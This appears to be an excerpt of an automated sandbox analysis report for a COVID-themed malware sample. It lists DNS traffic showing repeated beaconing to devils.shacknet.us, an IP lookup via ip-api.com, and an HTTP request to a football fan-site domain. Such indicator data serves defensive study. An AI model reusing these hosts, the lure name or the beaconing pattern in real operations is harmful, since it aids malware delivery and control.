                                                                        Mar 9, 2021 22:19:03.619352102 CET53495638.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:09.513113976 CET5135253192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:09.570144892 CET53513528.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:11.965225935 CET5934953192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:12.022548914 CET53593498.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:13.883763075 CET5708453192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:13.950110912 CET53570848.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:15.760910034 CET5882353192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:15.831058979 CET53588238.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:18.715285063 CET5756853192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:18.761272907 CET53575688.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:21.557945013 CET5054053192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:21.624181032 CET53505408.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:21.810141087 CET5436653192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:21.861080885 CET53543668.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:27.279315948 CET5303453192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:27.333874941 CET53530348.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:29.948606014 CET5776253192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:29.994796991 CET53577628.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:30.091726065 CET5543553192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:30.146279097 CET53554358.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:34.092900038 CET5071353192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:34.151823044 CET53507138.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:39.678539038 CET5613253192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:39.738023996 CET53561328.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:45.439196110 CET5898753192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:45.497406960 CET53589878.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:50.864279985 CET5657953192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:50.927226067 CET53565798.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:51.894696951 CET6063353192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:51.949301004 CET53606338.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:52.269222021 CET6129253192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:52.384860039 CET53612928.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:52.628706932 CET6361953192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:52.674660921 CET53636198.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:52.790004969 CET6493853192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:52.940454006 CET53649388.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:53.557470083 CET6194653192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:53.614737034 CET53619468.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:53.674988985 CET6491053192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:53.725074053 CET53649108.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:54.056265116 CET5212353192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:54.113677025 CET53521238.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:54.702188015 CET5613053192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:54.798266888 CET53561308.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:55.408808947 CET5633853192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:55.463251114 CET53563388.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:56.488538027 CET5942053192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:56.527760983 CET5878453192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:56.548188925 CET53594208.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:56.575413942 CET53587848.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:57.347887993 CET6397853192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:57.404872894 CET53639788.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:57.480279922 CET6293853192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:57.541975021 CET53629388.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:57.849899054 CET5570853192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:57.895513058 CET5680353192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:57.905742884 CET53557088.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:57.946150064 CET53568038.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:58.880578995 CET5714553192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:58.942990065 CET53571458.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:19:59.127901077 CET5535953192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:19:59.178555012 CET53553598.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:20:00.099204063 CET5830653192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:20:00.150648117 CET53583068.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:20:00.480453014 CET6412453192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:20:00.536406040 CET53641248.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:20:01.525139093 CET4936153192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:20:01.571022987 CET53493618.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:20:02.788249969 CET6315053192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:20:02.837240934 CET53631508.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:20:03.332735062 CET5327953192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:20:03.387307882 CET53532798.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:20:09.182174921 CET5688153192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:20:09.250173092 CET53568818.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:20:14.985282898 CET5364253192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:20:15.031423092 CET53536428.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:20:20.442473888 CET5566753192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:20:20.508057117 CET53556678.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:20:26.325524092 CET5483353192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:20:26.379894018 CET53548338.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:20:32.118603945 CET6247653192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:20:32.167268038 CET53624768.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:20:32.435609102 CET4970553192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:20:32.491579056 CET53497058.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:20:32.831954956 CET6147753192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:20:32.894377947 CET53614778.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:20:37.731206894 CET6163353192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:20:37.788578033 CET53616338.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:20:43.351438046 CET5594953192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:20:43.408850908 CET53559498.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:20:49.152934074 CET5760153192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:20:49.207376003 CET53576018.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:20:54.794719934 CET4934253192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:20:54.852171898 CET53493428.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:21:00.242969990 CET5625353192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:21:00.291558027 CET53562538.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:21:05.759392023 CET4966753192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:21:05.815201044 CET53496678.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:21:11.477591991 CET5543953192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:21:11.543409109 CET53554398.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:21:16.870245934 CET5706953192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:21:16.924406052 CET53570698.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:21:22.340548992 CET5765953192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:21:22.394833088 CET53576598.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:21:27.950625896 CET5471753192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:21:28.021846056 CET53547178.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:21:33.385584116 CET6397553192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:21:33.443941116 CET53639758.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:21:39.073884964 CET5663953192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:21:39.131376028 CET53566398.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:21:44.553935051 CET5185653192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:21:44.610470057 CET53518568.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:21:50.168900013 CET5654653192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:21:50.215176105 CET53565468.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:21:55.653825998 CET6215253192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:21:55.713428974 CET53621528.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:22:01.228869915 CET5347053192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:22:01.288381100 CET53534708.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:22:06.894661903 CET5644653192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:22:06.942980051 CET53564468.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:22:12.623385906 CET5963153192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:22:12.688786983 CET53596318.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:22:18.402961016 CET5551553192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:22:18.466923952 CET53555158.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:22:23.919096947 CET6454753192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:22:23.975603104 CET53645478.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:22:29.571541071 CET5175953192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:22:29.639086962 CET53517598.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:22:35.168447018 CET5920753192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:22:35.215699911 CET53592078.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:22:40.591886997 CET5426953192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:22:40.648597002 CET53542698.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:22:46.081101894 CET5485653192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:22:46.135624886 CET53548568.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:22:51.666096926 CET6414053192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:22:51.721893072 CET53641408.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:22:57.161659002 CET6227153192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:22:57.221400023 CET53622718.8.8.8192.168.2.3
                                                                        Mar 9, 2021 22:23:03.796614885 CET5740453192.168.2.38.8.8.8
                                                                        Mar 9, 2021 22:23:03.860832930 CET53574048.8.8.8192.168.2.3

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Mar 9, 2021 22:18:42.673446894 CET192.168.2.38.8.8.80xf6bdStandard query (0)liverpoolofcfanclub.comA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:02.293376923 CET192.168.2.38.8.8.80x5b7dStandard query (0)ip-api.comA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:03.552472115 CET192.168.2.38.8.8.80x72b8Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:09.513113976 CET192.168.2.38.8.8.80xc696Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:11.965225935 CET192.168.2.38.8.8.80xa966Standard query (0)liverpoolofcfanclub.comA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:15.760910034 CET192.168.2.38.8.8.80x669cStandard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:21.557945013 CET192.168.2.38.8.8.80x7df2Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:21.810141087 CET192.168.2.38.8.8.80xa688Standard query (0)liverpoolofcfanclub.comA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:27.279315948 CET192.168.2.38.8.8.80xec45Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:34.092900038 CET192.168.2.38.8.8.80x709bStandard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:39.678539038 CET192.168.2.38.8.8.80x947eStandard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:45.439196110 CET192.168.2.38.8.8.80x70d9Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:51.894696951 CET192.168.2.38.8.8.80x2d5cStandard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:57.480279922 CET192.168.2.38.8.8.80xb7beStandard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:20:03.332735062 CET192.168.2.38.8.8.80xb74Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:20:09.182174921 CET192.168.2.38.8.8.80x72b4Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:20:14.985282898 CET192.168.2.38.8.8.80x4ba0Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:20:20.442473888 CET192.168.2.38.8.8.80xe1f6Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:20:26.325524092 CET192.168.2.38.8.8.80x917cStandard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:20:32.435609102 CET192.168.2.38.8.8.80x4222Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:20:37.731206894 CET192.168.2.38.8.8.80x8ee8Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:20:43.351438046 CET192.168.2.38.8.8.80xe5cdStandard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:20:49.152934074 CET192.168.2.38.8.8.80xa80Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:20:54.794719934 CET192.168.2.38.8.8.80xedf6Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:21:00.242969990 CET192.168.2.38.8.8.80xe0f1Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:21:05.759392023 CET192.168.2.38.8.8.80xa1e3Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:21:11.477591991 CET192.168.2.38.8.8.80xdca6Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:21:16.870245934 CET192.168.2.38.8.8.80xf2b7Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:21:22.340548992 CET192.168.2.38.8.8.80xf4b5Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:21:27.950625896 CET192.168.2.38.8.8.80xcfdbStandard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:21:33.385584116 CET192.168.2.38.8.8.80x1720Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:21:39.073884964 CET192.168.2.38.8.8.80xe8beStandard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:21:44.553935051 CET192.168.2.38.8.8.80xbedcStandard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:21:50.168900013 CET192.168.2.38.8.8.80x2ad2Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:21:55.653825998 CET192.168.2.38.8.8.80xb649Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:22:01.228869915 CET192.168.2.38.8.8.80xa96eStandard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:22:06.894661903 CET192.168.2.38.8.8.80x29a3Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:22:12.623385906 CET192.168.2.38.8.8.80x91c4Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:22:18.402961016 CET192.168.2.38.8.8.80xafa6Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:22:23.919096947 CET192.168.2.38.8.8.80xde8aStandard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:22:29.571541071 CET192.168.2.38.8.8.80x9655Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:22:35.168447018 CET192.168.2.38.8.8.80x4507Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:22:40.591886997 CET192.168.2.38.8.8.80x2225Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:22:46.081101894 CET192.168.2.38.8.8.80x4e9cStandard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:22:51.666096926 CET192.168.2.38.8.8.80x3987Standard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:22:57.161659002 CET192.168.2.38.8.8.80x753cStandard query (0)devils.shacknet.usA (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:23:03.796614885 CET192.168.2.38.8.8.80x6b2dStandard query (0)devils.shacknet.usA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Mar 9, 2021 22:18:42.727751017 CET8.8.8.8192.168.2.30xf6bdNo error (0)liverpoolofcfanclub.com104.21.31.39A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:18:42.727751017 CET8.8.8.8192.168.2.30xf6bdNo error (0)liverpoolofcfanclub.com172.67.174.240A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:02.344770908 CET8.8.8.8192.168.2.30x5b7dNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:03.619352102 CET8.8.8.8192.168.2.30x72b8No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:09.570144892 CET8.8.8.8192.168.2.30xc696No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:12.022548914 CET8.8.8.8192.168.2.30xa966No error (0)liverpoolofcfanclub.com104.21.31.39A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:12.022548914 CET8.8.8.8192.168.2.30xa966No error (0)liverpoolofcfanclub.com172.67.174.240A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:15.831058979 CET8.8.8.8192.168.2.30x669cNo error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:21.624181032 CET8.8.8.8192.168.2.30x7df2No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:21.861080885 CET8.8.8.8192.168.2.30xa688No error (0)liverpoolofcfanclub.com104.21.31.39A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:21.861080885 CET8.8.8.8192.168.2.30xa688No error (0)liverpoolofcfanclub.com172.67.174.240A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:27.333874941 CET8.8.8.8192.168.2.30xec45No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:34.151823044 CET8.8.8.8192.168.2.30x709bNo error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:39.738023996 CET8.8.8.8192.168.2.30x947eNo error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:45.497406960 CET8.8.8.8192.168.2.30x70d9No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:51.949301004 CET8.8.8.8192.168.2.30x2d5cNo error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:19:57.541975021 CET8.8.8.8192.168.2.30xb7beNo error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:20:03.387307882 CET8.8.8.8192.168.2.30xb74No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:20:09.250173092 CET8.8.8.8192.168.2.30x72b4No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:20:15.031423092 CET8.8.8.8192.168.2.30x4ba0No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:20:20.508057117 CET8.8.8.8192.168.2.30xe1f6No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:20:26.379894018 CET8.8.8.8192.168.2.30x917cNo error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:20:32.491579056 CET8.8.8.8192.168.2.30x4222No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:20:37.788578033 CET8.8.8.8192.168.2.30x8ee8No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:20:43.408850908 CET8.8.8.8192.168.2.30xe5cdNo error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:20:49.207376003 CET8.8.8.8192.168.2.30xa80No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:20:54.852171898 CET8.8.8.8192.168.2.30xedf6No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:21:00.291558027 CET8.8.8.8192.168.2.30xe0f1No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:21:05.815201044 CET8.8.8.8192.168.2.30xa1e3No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:21:11.543409109 CET8.8.8.8192.168.2.30xdca6No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:21:16.924406052 CET8.8.8.8192.168.2.30xf2b7No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:21:22.394833088 CET8.8.8.8192.168.2.30xf4b5No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:21:28.021846056 CET8.8.8.8192.168.2.30xcfdbNo error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:21:33.443941116 CET8.8.8.8192.168.2.30x1720No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:21:39.131376028 CET8.8.8.8192.168.2.30xe8beNo error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:21:44.610470057 CET8.8.8.8192.168.2.30xbedcNo error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:21:50.215176105 CET8.8.8.8192.168.2.30x2ad2No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:21:55.713428974 CET8.8.8.8192.168.2.30xb649No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:22:01.288381100 CET8.8.8.8192.168.2.30xa96eNo error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:22:06.942980051 CET8.8.8.8192.168.2.30x29a3No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:22:12.688786983 CET8.8.8.8192.168.2.30x91c4No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:22:18.466923952 CET8.8.8.8192.168.2.30xafa6No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:22:23.975603104 CET8.8.8.8192.168.2.30xde8aNo error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:22:29.639086962 CET8.8.8.8192.168.2.30x9655No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:22:35.215699911 CET8.8.8.8192.168.2.30x4507No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:22:40.648597002 CET8.8.8.8192.168.2.30x2225No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:22:46.135624886 CET8.8.8.8192.168.2.30x4e9cNo error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:22:51.721893072 CET8.8.8.8192.168.2.30x3987No error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:22:57.221400023 CET8.8.8.8192.168.2.30x753cNo error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)
                                                                        Mar 9, 2021 22:23:03.860832930 CET8.8.8.8192.168.2.30x6b2dNo error (0)devils.shacknet.us103.28.70.164A (IP address)IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • liverpoolofcfanclub.com
                                                                        • ip-api.com

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.349710104.21.31.3980C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Mar 9, 2021 22:18:42.779385090 CET1159OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-62D0D2B15CF140C87AEA01E41DD7046D.html HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                        Host: liverpoolofcfanclub.com
                                                                        Connection: Keep-Alive
                                                                        Mar 9, 2021 22:18:42.994386911 CET1160INHTTP/1.1 200 OK
                                                                        Date: Tue, 09 Mar 2021 21:18:42 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Set-Cookie: __cfduid=dd3d659350d4364270ba956ac797122da1615324722; expires=Thu, 08-Apr-21 21:18:42 GMT; path=/; domain=.liverpoolofcfanclub.com; HttpOnly; SameSite=Lax
                                                                        Last-Modified: Tue, 09 Mar 2021 18:47:12 GMT
                                                                        Vary: Accept-Encoding
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 08ba744e7a00004aa95698b000000001
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=RNmhjYMm4chRd3U8zb6zpNvEo4CGdr945W1ZjWKWz5irYfyoWUf0eqW%2FJNhnUVoHvBWu8IC1EKbsTquHArEHJvHyB27Y%2BQp1OYYuDM%2Bc4tlEpi%2Fhk8YD8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 62d7565d9cfc4aa9-FRA
